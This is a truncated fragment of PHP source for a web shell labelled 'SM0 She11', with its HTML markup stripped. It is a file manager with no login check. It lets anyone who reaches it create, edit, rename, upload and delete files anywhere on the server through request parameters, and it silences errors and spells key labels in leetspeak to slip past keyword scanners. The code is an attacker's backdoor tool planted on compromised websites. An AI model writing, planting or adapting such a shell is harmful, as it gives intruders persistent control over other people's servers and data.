$p"; } return '

Path: / / ' . implode(' / ', $crumbs) . '

'; } // --- Handle POST Actions --- if($_SERVER['REQUEST_METHOD']==='POST'){ // Create Fil3 if(!empty($_POST['new_file'])) @file_put_contents($fullPath . DIRECTORY_SEPARATOR . basename($_POST['new_file']), ''); // Rename if(!empty($_POST['old_name']) && !empty($_POST['new_name'])) @rename($fullPath . DIRECTORY_SEPARATOR . $_POST['old_name'], $fullPath . DIRECTORY_SEPARATOR . $_POST['new_name']); // Save edited Fil3 if(!empty($_POST['edit_file']) && isset($_POST['content'])) @file_put_contents($fullPath . DIRECTORY_SEPARATOR . $_POST['edit_file'], $_POST['content']); // Upl04d Fil3 if(!empty($_FILES['_upl']['tmp_name'])) @copy($_FILES['_upl']['tmp_name'], $fullPath . DIRECTORY_SEPARATOR . basename($_FILES['_upl']['name'])); header("Location:?folder=" . urlencode($fullPath)); exit; } // --- Delete Fil3/Folders --- if(isset($_GET['delete'])){ $target = $fullPath . DIRECTORY_SEPARATOR . $_GET['delete']; if(is_dir($target)) @rmdir($target); elseif(is_file($target)) @unlink($target); header("Location:?folder=" . urlencode($fullPath)); exit; } // --- Directory Listing --- $items = @scandir($fullPath); ?> SM0 She11

SM0 She11

Full Path (server):

Editing: ".$_GET['edit'].""; echo "

"; } } ?>